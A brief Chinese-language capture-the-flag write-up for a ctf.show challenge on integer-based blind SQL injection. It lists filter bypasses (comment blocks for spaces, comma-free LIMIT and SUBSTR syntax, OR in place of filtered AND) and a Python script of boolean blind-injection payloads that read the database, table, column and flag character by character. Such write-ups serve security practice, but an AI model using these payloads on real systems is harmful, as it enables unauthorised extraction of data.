整形注入
判断是字符型还是整形注入
1.检查是否存在注入
2.空格过滤用/**/替换
3. ,过滤:
将limit 0,1样式改为limit 1 offset 0。
将substr(string,1,1)改为substr(string from 1 for 1)。
id=-1 /**/or /**/1=1 返回正确
id=-1/**/or/**/1=2 错误没有回显应该是盲注
说明是整形注入
这里过滤了and
import requests
url='http://e2312a42-19a7-4415-a67b-d64f86d87d53.challenge.ctf.show:8080/index.php?id=-3'
payload1=url+"/**/or/**/ascii(substr(database()/**/from/**/{}/**/for/**/1))={}"
payload2=url+"/**/or/**/ascii(substr((select(table_name)from/**/information_schema.tables/**/where/**/table_schema=\"web8\"limit/**/1/**/offset/**/0)from/**/{}/**/for/**/1))={}"
payload3=url+"/**/or/**/ascii(substr((select(column_name)from/**/information_schema.columns/**/where/**/table_name=\"flag\"limit/**/1/**/offset/**/0)from/**/{}/**/for/**/1))={}"
payload=url+"/**/or/**/ascii(substr((select(flag)from/**/flag/**/limit/**/1/**/offset/**/0)from/**/{}/**/for/**/1))={}"
flag=''
str='1234567890abcdefghijklmnopqrstuvwxyz-{}'
for i in range(200):
for j in str:
res=requests.get(payload.format(i,ord(j)))
# print(payload2.format(i,j))
if('If' in res.text):
flag=flag+j
print(flag)
if(j=='}'):
break